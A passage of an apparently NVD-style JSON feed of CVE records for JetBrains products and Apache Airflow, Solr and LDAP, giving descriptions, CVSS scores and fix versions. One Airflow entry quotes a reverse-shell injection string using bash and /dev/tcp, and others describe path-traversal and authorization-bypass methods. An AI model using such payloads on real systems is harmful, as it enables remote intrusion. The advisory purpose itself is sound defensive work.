Advisory"]}]}},{"cve":{"id":"CVE-2026-49368","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.553","lastModified":"2026-06-01T12:56:25.727","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 stored XSS in project notification templates was 
possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":5.8},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49369","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.677","lastModified":"2026-06-01T12:56:04.370","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on Users and Groups 
pages"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49370","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:26.793","lastModified":"2026-06-01T12:52:41.640","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp 
requests"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N","baseScore":3.4,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-201"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49382","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.223","lastModified":"2026-06-01T13:59:29.857","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1 code execution was possible via template injection in the Copyright 
plugin"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":4.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.0,"impactScore":3.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-1336"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1","matchCriteriaId":"FA503AD2-B0F0-47D1-984A-E40B3D3200FD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49383","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.340","lastModified":"2026-06-01T13:58:14.507","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1 XXE in the UI Designer form parser was 
possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":3.3,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":1.4}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1","matchCriteriaId":"FA503AD2-B0F0-47D1-984A-E40B3D3200FD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49384","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.453","lastModified":"2026-06-01T12:44:17.300","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains PyCharm before 2025.3.4 stored XSS in Jupyter notebook Markdown cells was 
possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:pycharm:*:*:*:*:*:*:*:*","versionEndExcluding":"2025.3.4","matchCriteriaId":"4FD21590-E657-4A6D-B205-4E68B9229E20"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49385","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.567","lastModified":"2026-06-01T12:41:03.800","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13570 improper access control allowed low-privileged users to modify service 
accounts"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13570","matchCriteriaId":"ADA8504E-1873-4D57-ACA1-2F17F20FC926"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49386","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.683","lastModified":"2026-06-01T12:40:37.790","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13570 improper access control allowed enumeration of restricted issues and articles on Planning 
Canvas"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13570","matchCriteriaId":"ADA8504E-1873-4D57-ACA1-2F17F20FC926"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35563","sourceIdentifier":"security@apache.org","published":"2026-06-01T08:16:20.307","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"It was identified that the LDAP client implementation in version 2.1.7 does not verify if the server certificate matches the intended LDAP \nhostname. While the underlying code validates the certificate chain \nagainst a trusted authority, the absence of endpoint identification \nallows a valid certificate issued for an entirely unrelated host to be \nimproperly accepted. This oversight leaves the connection highly \nvulnerable to server impersonation and complete connection compromise.\n\n\nThe\n root cause of this vulnerability lies in the incomplete TLS server \nidentity verification within the LDAP client implementation.\n\n\n\n\nThe attacker requires MITM capability on the network to exploit this vulnerability. 
This attacker must be able to present a certificate trusted by the client's configured trust store.\n\n\n\n\nThe hostname verification has been enforced in the new version of the LDAP API"}],"metrics":{"cvssMetricV40":[{"source":"security@apache.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"LOW","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-297"}]}],"references":[{"url":"https://lists.apache.org/thread/5rc2nzqxp1m9wknyf93r8dnp46fhc1nn","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/06/01/2","source":"af854a3a-2127-422b-91
ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-40861","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:17.893","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack — e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-59"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65325","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/1","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-40961","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.010","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. 
Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65557","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/qmt8ksh7gty6b8hr9w294t94j36jdv1q","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/2","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-41014","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.230","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. 
Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65344","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/12nbzwwby7g883w2j13gn7ny1545xob9","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/4","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-41084","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.453","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` extracted from request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request body entities. Affects deployments that rely on per-Dag edit-scope to keep Task Instance state isolated between teams. 
Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/64288","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/w0hdcqfr71hf9rl1bwvpjs7q9yp1bldk","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/7","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-42252","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.560","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf['conf1'] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i >& /dev/tcp/.../9999 0>&1; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. 
Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-1336"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/64129","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-42359","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.907","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. 
Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65915","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/g8dqykpf1p90tysq8tln4qtkqwb1038s","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-44825","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.267","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allow a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. 
\n\nAs an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords.\nThe future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue.\n\nNot affected:\n  *  Clusters where bin/solr auth enable was not used to bootstrap BasicAuth\n  *  Clusters where template users have been assigned strong passwords after bootstrap"}],"metrics":{"cvssMetricV31":[{"source":"security@apache.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-798"},{"lang":"en","value":"CWE-1188"}]}],"references":[{"url":"https://lists.apache.org/thread/5xg6xr99glocp3zsg9ht2zlbwlrst7ch","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/29/6","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-45360","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.480","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. 
A DAG author whose code reaches the scheduler — the default on single-host deployments where the DAG bundle is importable from the scheduler process — could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/66737","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/12","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-45426","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.583","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). 
Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/66749","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/13","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-46764","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.073","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. 
Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/67112","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/ctrbj7q3m86g4qxmo9ponojgmzrcoqpv","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/14","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-48726","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.187","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. 
Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-613"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/67289","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx","source":"security@apache.org"},{"url":"https://www.cve.org/CVERecord?id=CVE-2025-57735","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49267","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.543","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (network MITM — typical hostile-network attack-surface for environments where the SMTP relay sits outside 